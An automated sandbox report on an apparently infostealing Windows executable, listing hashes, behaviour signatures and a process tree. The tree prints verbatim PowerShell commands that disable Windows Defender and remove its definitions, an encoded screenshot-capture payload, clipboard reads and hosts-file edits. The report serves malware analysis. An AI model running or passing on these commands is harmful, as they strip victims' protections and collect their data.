Analysis
  max time kernel: 93s
  max time network: 130s
  platform: windows10-2004_x64
  resource: win10v2004-20250129-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20250129-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 31/01/2025, 20:43
Behavioral task: behavioral1
  Sample: lGxCmyo.exe
  Resource: win7-20241023-en
Behavioral task: behavioral2
  Sample: lGxCmyo.exe
  Resource: win10v2004-20250129-en
General
  Target: lGxCmyo.exe
  Size: 6.3MB
  MD5: 8b566fdf77f5acf29c6c5bd2d52eacab
  SHA1: 19842502be7711f7e4d303c71184dc0b2ac05798
  SHA256: 4dcab4dff066a113b9f2cea94b1b21837cf92f0874eb3c4fc166824546ff5271
  SHA512: d3e12e3a8f5593a8e7eb7c78c0b27e1a2b9ba229a2ab4ff14675589617a43185a9bea8ffa4b26586e9744b39b657d143645f76bcac21f20fbab45509998c1ff6
  SSDEEP: 98304:ijcIruEVC6IEq9Vyn//5gcllxt3bzBoUv6aQ/BDyZeut1BDjRhh:WDCjTA//5gcllfrNJ6jBGwutlhh
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 4 IoCs)
  Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid   Process
  4684  powershell.exe
  5096  powershell.exe
  896   powershell.exe
  1944  powershell.exe
Drops file in Drivers directory (1 IoCs)
  description                    ioc                                      Process
  File opened for modification   C:\Windows\System32\drivers\etc\hosts    lGxCmyo.exe
ACProtect 1.3x - 1.4x DLL software (16 IoCs)
  Detects file using ACProtect software.
  resource (yara_rule: acprotect)
  behavioral2/files/0x000a000000023b64-21.dat
  behavioral2/files/0x000a000000023b57-27.dat
  behavioral2/files/0x000a000000023b62-29.dat
  behavioral2/files/0x000a000000023b5e-48.dat
  behavioral2/files/0x000a000000023b5d-47.dat
  behavioral2/files/0x0031000000023b5c-46.dat
  behavioral2/files/0x0031000000023b5b-45.dat
  behavioral2/files/0x0031000000023b5a-44.dat
  behavioral2/files/0x000a000000023b59-43.dat
  behavioral2/files/0x000a000000023b58-42.dat
  behavioral2/files/0x000a000000023b56-41.dat
  behavioral2/files/0x000a000000023b69-40.dat
  behavioral2/files/0x000a000000023b68-39.dat
  behavioral2/files/0x000a000000023b67-38.dat
  behavioral2/files/0x000a000000023b63-35.dat
  behavioral2/files/0x000a000000023b61-34.dat
Clipboard Data (1 TTPs, 2 IoCs)
  Adversaries may collect data stored in the clipboard from users copying information within or between applications.
  pid   Process
  3004  cmd.exe
  2076  powershell.exe
Executes dropped EXE (1 IoCs)
  pid   Process
  2208  rar.exe
Loads dropped DLL (17 IoCs)
  pid   Process       events
  4332  lGxCmyo.exe   17
Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow   ioc
  26     discord.com
  27     discord.com
Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow   ioc
  18     ip-api.com
  24     ip-api.com
Obfuscated Files or Information: Command Obfuscation (1 TTPs)
  Adversaries may obfuscate content during command execution to impede detection.
Enumerates processes with tasklist (1 TTPs, 5 IoCs)
  pid   Process
  540   tasklist.exe
  1852  tasklist.exe
  1860  tasklist.exe
  3720  tasklist.exe
  1220  tasklist.exe
upx (YARA rule matches)
  resource (yara_rule: upx)
  behavioral2/files/0x000a000000023b64-21.dat
  behavioral2/memory/4332-25-0x0000000075310000-0x0000000075823000-memory.dmp
  behavioral2/files/0x000a000000023b57-27.dat
  behavioral2/files/0x000a000000023b62-29.dat
  behavioral2/memory/4332-32-0x00000000752B0000-0x00000000752BD000-memory.dmp
  behavioral2/files/0x000a000000023b5e-48.dat
  behavioral2/files/0x000a000000023b5d-47.dat
  behavioral2/files/0x0031000000023b5c-46.dat
  behavioral2/files/0x0031000000023b5b-45.dat
  behavioral2/files/0x0031000000023b5a-44.dat
  behavioral2/files/0x000a000000023b59-43.dat
  behavioral2/files/0x000a000000023b58-42.dat
  behavioral2/files/0x000a000000023b56-41.dat
  behavioral2/files/0x000a000000023b69-40.dat
  behavioral2/files/0x000a000000023b68-39.dat
  behavioral2/files/0x000a000000023b67-38.dat
  behavioral2/files/0x000a000000023b63-35.dat
  behavioral2/files/0x000a000000023b61-34.dat
  behavioral2/memory/4332-30-0x00000000752C0000-0x00000000752DE000-memory.dmp
  behavioral2/memory/4332-54-0x0000000075280000-0x00000000752A7000-memory.dmp
  behavioral2/memory/4332-56-0x0000000075260000-0x0000000075278000-memory.dmp
  behavioral2/memory/4332-58-0x0000000075240000-0x000000007525B000-memory.dmp
  behavioral2/memory/4332-60-0x0000000075100000-0x000000007523A000-memory.dmp
  behavioral2/memory/4332-62-0x00000000750E0000-0x00000000750F6000-memory.dmp
  behavioral2/memory/4332-64-0x0000000075090000-0x000000007509C000-memory.dmp
  behavioral2/memory/4332-66-0x0000000075060000-0x000000007508C000-memory.dmp
  behavioral2/memory/4332-73-0x0000000074C20000-0x0000000074FAD000-memory.dmp
  behavioral2/memory/4332-74-0x00000000752C0000-0x00000000752DE000-memory.dmp
  behavioral2/memory/4332-71-0x0000000074FB0000-0x0000000075059000-memory.dmp
  behavioral2/memory/4332-70-0x0000000075310000-0x0000000075823000-memory.dmp
  behavioral2/memory/4332-76-0x0000000074BB0000-0x0000000074BC0000-memory.dmp
  behavioral2/memory/4332-79-0x0000000074BA0000-0x0000000074BAC000-memory.dmp
  behavioral2/memory/4332-78-0x0000000075280000-0x00000000752A7000-memory.dmp
  behavioral2/memory/4332-81-0x0000000074A70000-0x0000000074B89000-memory.dmp
  behavioral2/memory/4332-106-0x0000000075240000-0x000000007525B000-memory.dmp
  behavioral2/memory/4332-109-0x0000000075100000-0x000000007523A000-memory.dmp
  behavioral2/memory/4332-136-0x00000000750E0000-0x00000000750F6000-memory.dmp
  behavioral2/memory/4332-219-0x0000000075060000-0x000000007508C000-memory.dmp
  behavioral2/memory/4332-242-0x0000000074FB0000-0x0000000075059000-memory.dmp
  behavioral2/memory/4332-257-0x0000000074C20000-0x0000000074FAD000-memory.dmp
  behavioral2/memory/4332-305-0x0000000075100000-0x000000007523A000-memory.dmp
  behavioral2/memory/4332-314-0x0000000074BB0000-0x0000000074BC0000-memory.dmp
  behavioral2/memory/4332-312-0x0000000074BA0000-0x0000000074BAC000-memory.dmp
  behavioral2/memory/4332-299-0x0000000075310000-0x0000000075823000-memory.dmp
  behavioral2/memory/4332-300-0x00000000752C0000-0x00000000752DE000-memory.dmp
  behavioral2/memory/4332-357-0x0000000075310000-0x0000000075823000-memory.dmp
  behavioral2/memory/4332-387-0x0000000074C20000-0x0000000074FAD000-memory.dmp
  behavioral2/memory/4332-372-0x0000000075310000-0x0000000075823000-memory.dmp
  behavioral2/memory/4332-400-0x0000000074A70000-0x0000000074B89000-memory.dmp
  behavioral2/memory/4332-399-0x0000000074BA0000-0x0000000074BAC000-memory.dmp
  behavioral2/memory/4332-398-0x0000000074BB0000-0x0000000074BC0000-memory.dmp
  behavioral2/memory/4332-397-0x0000000074FB0000-0x0000000075059000-memory.dmp
  behavioral2/memory/4332-396-0x0000000075060000-0x000000007508C000-memory.dmp
  behavioral2/memory/4332-395-0x0000000075090000-0x000000007509C000-memory.dmp
  behavioral2/memory/4332-394-0x00000000750E0000-0x00000000750F6000-memory.dmp
  behavioral2/memory/4332-393-0x0000000075100000-0x000000007523A000-memory.dmp
  behavioral2/memory/4332-392-0x0000000075240000-0x000000007525B000-memory.dmp
  behavioral2/memory/4332-391-0x0000000075260000-0x0000000075278000-memory.dmp
  behavioral2/memory/4332-390-0x0000000075280000-0x00000000752A7000-memory.dmp
  behavioral2/memory/4332-389-0x00000000752B0000-0x00000000752BD000-memory.dmp
  behavioral2/memory/4332-388-0x00000000752C0000-0x00000000752DE000-memory.dmp
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 64 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description   ioc                                                          Process (number of events)
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe (31), WMIC.exe (8), powershell.exe (7), tree.com (5), tasklist.exe (4), reg.exe (2), csc.exe (1), systeminfo.exe (1), attrib.exe (1), mshta.exe (1), cvtres.exe (1), getmac.exe (1), lGxCmyo.exe (1)
Detects videocard installed (1 TTPs, 3 IoCs)
  Uses WMIC.exe to determine videocard installed.
  pid   Process
  4896  WMIC.exe
  628   WMIC.exe
  3504  WMIC.exe
Gathers system information (1 TTPs, 1 IoCs)
  Runs systeminfo.exe.
  pid   Process
  1420  systeminfo.exe
Suspicious behavior: EnumeratesProcesses (19 IoCs)
  pid   Process          events
  896   powershell.exe   3
  4684  powershell.exe   3
  5096  powershell.exe   3
  2076  powershell.exe   3
  4088  powershell.exe   3
  1944  powershell.exe   2
  2628  powershell.exe   2
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid   Process          Token(s), in the order recorded
  540   tasklist.exe     SeDebugPrivilege
  4684  powershell.exe   SeDebugPrivilege
  896   powershell.exe   SeDebugPrivilege
  4892  WMIC.exe         SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this same 21-token sequence is recorded twice)
  628   WMIC.exe         SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34
Suspicious use of WriteProcessMemory (64 IoCs)
  pid   Process       wrote to memory of (pid)   procid_target   events
  2152  lGxCmyo.exe   4332                       85              3
  4332  lGxCmyo.exe   4780                       87              3
  4332  lGxCmyo.exe   3008                       88              3
  4332  lGxCmyo.exe   5008                       89              3
  4332  lGxCmyo.exe   4580                       91              3
  4580  cmd.exe       540                        95              3
  4780  cmd.exe       4684                       96              3
  3008  cmd.exe       896                        97              3
  5008  cmd.exe       2952                       98              3
  4332  lGxCmyo.exe   2180                       100             3
  2180  cmd.exe       4892                       102             3
  4332  lGxCmyo.exe   2084                       103             3
  2084  cmd.exe       4156                       105             3
  4332  lGxCmyo.exe   1080                       106             3
  1080  cmd.exe       3264                       108             3
  4332  lGxCmyo.exe   4032                       109             3
  4032  cmd.exe       628                        176             3
  4332  lGxCmyo.exe   228                        112             3
  228   cmd.exe       3504                       114             3
  4332  lGxCmyo.exe   3408                       115             3
  3408  cmd.exe       5096                       117             3
  4332  lGxCmyo.exe   1284                       118             1
Views/modifies file attributes (1 TTPs, 2 IoCs)
  pid   Process
  2848  attrib.exe
  2796  attrib.exe
Processes
  [1] Image: C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe
      Command: "C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe"
      - Suspicious use of WriteProcessMemory
      PID: 2152
    [2] Image: C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe
        Command: "C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe"
        - Drops file in Drivers directory
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 4332
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe'"
          - Suspicious use of WriteProcessMemory
          PID: 4780
        [4] Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe'
            - Command and Scripting Interpreter: PowerShell
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 4684
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 3008
        [4] Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            - Command and Scripting Interpreter: PowerShell
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 896
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Invalid download (retry again)', 0, 'Error', 0+16);close()""
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 5008
        [4] Image: C:\Windows\SysWOW64\mshta.exe
            Command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Invalid download (retry again)', 0, 'Error', 0+16);close()"
            - System Location Discovery: System Language Discovery
            PID: 2952
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 4580
        [4] Image: C:\Windows\SysWOW64\tasklist.exe
            Command: tasklist /FO LIST
            - Enumerates processes with tasklist
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
            PID: 540
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 2180
        [4] Image: C:\Windows\SysWOW64\Wbem\WMIC.exe
            Command: wmic csproduct get uuid
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
            PID: 4892
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          - Suspicious use of WriteProcessMemory
          PID: 2084
        [4] Image: C:\Windows\SysWOW64\reg.exe
            Command: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            - System Location Discovery: System Language Discovery
            PID: 4156
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 1080
        [4] Image: C:\Windows\SysWOW64\reg.exe
            Command: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            PID: 3264
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 4032
        [4] Image: C:\Windows\SysWOW64\Wbem\WMIC.exe
            Command: wmic path win32_VideoController get name
            - System Location Discovery: System Language Discovery
            - Detects videocard installed
            - Suspicious use of AdjustPrivilegeToken
            PID: 628
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 228
        [4] Image: C:\Windows\SysWOW64\Wbem\WMIC.exe
            Command: wmic path win32_VideoController get name
            - System Location Discovery: System Language Discovery
            - Detects videocard installed
            PID: 3504
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 3408
        [4] Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
            - Command and Scripting Interpreter: PowerShell
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            PID: 5096
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - System Location Discovery: System Language Discovery
          PID: 1284
        [4] Image: C:\Windows\SysWOW64\tasklist.exe
            Command: tasklist /FO LIST
            - Enumerates processes with tasklist
            - System Location Discovery: System Language Discovery
            PID: 1860
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - System Location Discovery: System Language Discovery
          PID: 620
        [4] Image: C:\Windows\SysWOW64\tasklist.exe
            Command: tasklist /FO LIST
            - Enumerates processes with tasklist
            - System Location Discovery: System Language Discovery
            PID: 1852
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          PID: 3988
        [4] Image: C:\Windows\SysWOW64\Wbem\WMIC.exe
            Command: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            - System Location Discovery: System Language Discovery
            PID: 2972
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          - Clipboard Data
          - System Location Discovery: System Language Discovery
          PID: 3004
        [4] Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command: powershell Get-Clipboard
            - Clipboard Data
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            PID: 2076
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - System Location Discovery: System Language Discovery
          PID: 1616
        [4] Image: C:\Windows\SysWOW64\tasklist.exe
            Command: tasklist /FO LIST
            - Enumerates processes with tasklist
            - System Location Discovery: System Language Discovery
            PID: 3720
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "tree /A /F"
          - System Location Discovery: System Language Discovery
          PID: 4000
        [4] Image: C:\Windows\SysWOW64\tree.com
            Command: tree /A /F
            PID: 4456
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "systeminfo"
          - System Location Discovery: System Language Discovery
          PID: 4964
        [4] Image: C:\Windows\SysWOW64\systeminfo.exe
            Command: systeminfo
            - System Location Discovery: System Language Discovery
            - Gathers system information
            PID: 1420
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          - System Location Discovery: System Language Discovery
          PID: 1344
        [4] Image: C:\Windows\SysWOW64\reg.exe
            Command: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            - System Location Discovery: System Language Discovery
            PID: 3952
      [3] Image: C:\Windows\SysWOW64\cmd.exe
          Command (as extracted, image path and command line run together):
C:\Windows\SysWOW64\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
- System Location Discovery: System Language Discovery
PID: 4876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID: 4088

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (level 5)
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e5ygbgce\e5ygbgce.cmdline"
- System Location Discovery: System Language Discovery
PID: 964

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (level 6)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7D6.tmp" "c:\Users\Admin\AppData\Local\Temp\e5ygbgce\CSC866E9FC6C8794252A890904B786117.TMP"
- System Location Discovery: System Language Discovery
PID: 1980

C:\Windows\SysWOW64\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tree /A /F"
- System Location Discovery: System Language Discovery
PID: 1716

C:\Windows\SysWOW64\tree.com (level 4)
tree /A /F
- System Location Discovery: System Language Discovery
PID: 3448

C:\Windows\SysWOW64\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
- System Location Discovery: System Language Discovery
PID: 1892

C:\Windows\SysWOW64\attrib.exe (level 4)
attrib -r C:\Windows\System32\drivers\etc\hosts
- Views/modifies file attributes
PID: 2796

C:\Windows\SysWOW64\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tree /A /F"
- System Location Discovery: System Language Discovery
PID: 4340

C:\Windows\SysWOW64\tree.com (level 4)
tree /A /F
- System Location Discovery: System Language Discovery
PID: 4592

C:\Windows\SysWOW64\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
- System Location Discovery: System Language Discovery
PID: 4628

C:\Windows\SysWOW64\attrib.exe (level 4)
attrib +r C:\Windows\System32\drivers\etc\hosts
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
